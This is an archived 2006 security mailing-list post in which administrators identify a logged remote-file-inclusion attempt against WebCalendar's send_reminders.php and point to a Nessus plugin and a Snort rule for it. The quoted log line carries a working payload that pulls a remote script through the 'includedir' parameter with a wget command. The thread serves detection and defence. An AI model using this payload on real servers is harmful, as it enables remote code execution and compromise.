[Dshield] Webcal Exploit?

George A. Theall theall at tifaware.com
Tue Feb 7 20:01:12 GMT 2006


On Tue, Feb 07, 2006 at 11:34:16AM -0500, David Cary Hart wrote:
> On Mon, 06 Feb 2006 17:52:38 -0600
> Frank Knobbe <frank at knobbe.us> opined:
> > On Mon, 2006-02-06 at 14:35 -0500, George A. Theall wrote:
> > > > 81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET
> > > > http://68.236.166.73/Webcal42/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget
> > > > HTTP/1.0" 302 290
> > > 
> > > Yes, that's from BID 14651.  I wrote a Nessus plugin for that last
> > > August:
> > 
> > I see your August and raise you March. Seems like we had a BleedingSnort
> > rule for this at least since March 2005.
> > http://www.bleedingsnort.com/cgi-bin/viewcvs.cgi/sigs/WEB/WEB_PHP_Injection?view=markup
> > 
> > Thanks for the BID reference, I'll add that shortly to the sig.
> > 
> I'm still getting quite a few of these. Perhaps there is a new
> exploit???

No.  Take a look at the BID or the Nessus plugin -- you can include
files remotely through the 'includedir' parameter of
'tools/send_reminders.php', which is what your logs show the attackers 
trying to do.

George
-- 
theall at tifaware.com
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://www.dshield.org/pipermail/list/attachments/20060207/374a7c93/attachment.bin


More information about the list mailing list